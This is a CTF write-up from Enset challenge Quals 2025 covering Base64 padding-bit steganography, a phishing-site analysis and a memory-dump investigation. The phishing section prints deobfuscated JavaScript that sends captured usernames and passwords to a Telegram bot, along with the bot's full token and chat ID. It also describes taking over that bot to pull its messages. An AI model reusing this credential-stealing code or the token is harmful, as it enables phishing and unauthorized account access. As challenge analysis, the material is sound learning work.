Enset challenge Quals 2025 Writeups

Enset challenge CTF 2025

In this post, I'll walk through the solutions for some challenges from Enset challenge CTF 2025: 2 DFIR challs and one crypto for now.

Challenge 1: Base64 Bityy Bits!

Description

The challenge provided us with a file, steg64.txt, just a normal file!

Solution

Base64 encodes data in 6-bit chunks. When the input length is not a multiple of 3 bytes, the last character before the = padding carries a few bits that aren't used and are normally set to zero. This challenge hides secret bits in those unused parts. Standard Base64 decoders ignore them, but we can extract them manually by reading the raw 6-bit values. (I had to use CyberChef to notice the process at first.)

V0F=
Qz==
SI==
IN==
S9==
QQ==
Tt==
Qi==
QR==
Tg==
TF==
ST==
Sx==
ID==
Nx==
Te==
Qd==
Uo==
IF==
Uh==
Qd==
S7==
IB==
TK==
Qd==
M3==
Qt==
IG==
TZ==
Mx==
Qd==
IF==
TJ==
S9==
Ql==
QW==
Ug==
Ic==
Cp==
U0==
SZ==
Uq==
IB==
OZ==
Uh==
QR==
IN==
RB==
T5==
Up==
T5==
U2==
S5==
IL==
TV==
Qe==
VB==
Ta==
Qx==
SG==
SZ==
Q9==
SM==
IP==
Qk==
M/==
SV==
RP==
IF==

And thus my script:

BASE64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def b64_to_6bits(s):
    # Map every Base64 character to its 6-bit value; '=' and newlines are skipped
    return ''.join(f'{BASE64_ALPHABET.index(c):06b}' for c in s if c in BASE64_ALPHABET)

def extract_bytes(bitstring):
    # Pack the bit string into bytes, dropping any incomplete trailing byte
    return bytes(int(bitstring[i:i+8], 2) for i in range(0, len(bitstring)-7, 8))

cover_bits = ''
hidden_bits = ''

with open('steg64.txt') as f:
    for line in f:
        bits = b64_to_6bits(line.strip())
        # Whole bytes are the cover text; the 2 or 4 leftover bits are the hidden data
        byte_len = len(bits) // 8 * 8
        cover_bits += bits[:byte_len]
        hidden_bits += bits[byte_len:]

print("Cover Message:", extract_bytes(cover_bits))
print("Hidden Message:", extract_bytes(hidden_bits))
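
A defender's view of the same trick, as an added example that is not part of the original writeup: a line whose unused bits are nonzero does not survive decode and re-encode unchanged, so that comparison flags carrier lines while the leftover bits are collected. The names split_line, scan, SAMPLE and CLEAN are this example's own, and CLEAN is a constructed control.

```python
import base64

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def split_line(line):
    """Split one padded Base64 line into (decoded bytes, slack bits as a '0'/'1' string)."""
    chars = line.strip().rstrip("=")
    value = 0
    for c in chars:
        value = (value << 6) | ALPHABET.index(c)  # ValueError on a non-Base64 character
    nbits = 6 * len(chars)
    slack = nbits % 8  # 0, 2 or 4 trailing bits that a decoder throws away
    if slack == 6:  # one leftover character can never encode a whole byte
        raise ValueError(f"impossible Base64 length: {line!r}")
    data = (value >> slack).to_bytes(nbits // 8, "big")
    bits = format(value & ((1 << slack) - 1), f"0{slack}b") if slack else ""
    return data, bits

def scan(lines):
    """Return (cover bytes, hidden bytes, 1-based numbers of non-canonical lines)."""
    cover, bits, flagged = b"", "", []
    for number, line in enumerate(lines, 1):
        data, slack_bits = split_line(line)
        cover += data
        bits += slack_bits
        # A canonical encoder always zeroes the slack bits, so a line that does not
        # survive decode -> re-encode unchanged is carrying something in them.
        if base64.b64encode(data).decode() != line.strip():
            flagged.append(number)
    usable = len(bits) - len(bits) % 8  # drop an incomplete trailing byte
    hidden = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
    return cover, hidden, flagged

# First six lines of the challenge file as listed above.
SAMPLE = ["V0F=", "Qz==", "SI==", "IN==", "S9==", "QQ=="]
# Constructed control: canonical encodings of b"WA" and b"C".
CLEAN = ["V0E=", "Qw=="]

if __name__ == "__main__":
    print(scan(SAMPLE))  # cover text, recovered bytes, flagged line numbers
    print(scan(CLEAN))   # nothing hidden, nothing flagged
```

A line whose hidden bits happen to be all zero (the sixth sample line) is indistinguishable from a canonical one, so the flagged list is a lower bound on the carrier lines.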

Flag

N7CHALL{aGlk_ZGVuX2RhdGFfZmxhZw==}

Challenge 2: Abdo tchigger - DFIR

We were given a .eml file, a classic phishing email containing a link to a suspicious site: https://insagram-psi.vercel.app. Inspecting the site, the deobfuscated script revealed data exfiltration via a Telegram bot. It included the bot token and a chat ID, likely where stolen data was sent.

function postData() {
  const _0x3539c7 = document.getElementById("username").value;
  const _0x5cae27 = document.getElementById("password").value;
  fetch("https://api.telegram.org/bot7809830507:AAHgALe4iP7-MRFb7vPfXAbNp5WqScZ4_v0/sendMessage", {
    'method': "POST",
    'headers': {
      'Content-Type': "application/json"
    },
    'body': JSON.stringify({
      'chat_id': "7881225317",
      'text': "Username: " + _0x3539c7 + "\nPassword: " + _0x5cae27
    })
  }).then(_0x3077d5 => _0x3077d5.json()).then(_0x56ac0e => {
    console.log("Success:", _0x56ac0e);
  })["catch"](_0x44b17c => {
    console.error("Error:", _0x44b17c);
  });
}

After verifying the bot's permissions (able to send messages to private chats), I joined the bot and started a chat, then I retrieved my chat ID using userbotinfo, and used Telegram's API and a script to brute-force message IDs and forward them to my Telegram account until I found the flag.

Flag

N7CHALL{Abd0_Tch1gg3r_Ph1sh3d_L1k3_A_B0SS}

Challenge 3: Trust Issues - DFIR

We got a dump.vmem file. Checking the running processes at the time of the memory capture, we noticed notepad.exe was used to open and write to a file named keepassword.txt. Dumping the content revealed a password: enset@2025.

That instantly hinted we might be dealing with a KeePass database. Digging deeper, and after dumping the user's command history, we started to piece together exactly what happened.

cd .\Desktop\
notepad.exe keepass-pass.txt
ls
7z
cd ..
cleaer
clear
cd .\Desktop\
ls
notepad.exe keepass-passwd.txt
7z a -tzip -p"n01v4trustn01" -mem=AES256 secured_flag.zip .\flag.kdbx
ls
.\winpmem_mini_x64_rc2.exe memory.raw
clear
ls
cd .\Desktop\
ls
clear
7z a -tzip -p"n01v4trustn01" -mem=AES256 flag.zip .\flag.kdbx
rm .\flag.kdbx
nano .\keepasswd.txt
notepad.exe .\keepasswd.txt
$zipFile = Get-Content C:\Users\Public\secured_flag.zip -Raw`
Start-Sleep -Seconds 60  # Keep it in memory before dumping
cd .\Desktop\
$zipFile = Get-Content C:\Users\Public\secured_flag.zip -Raw`
Start-Sleep -Seconds 60
$zipFile = Get-Content flag.zip -Raw`
Start-Sleep -Seconds 60

From here, it's easy.

Flag

N7CHALL{Tru5t_N0_0ne_4lways_Expl0it}

[more writeups after the exams...]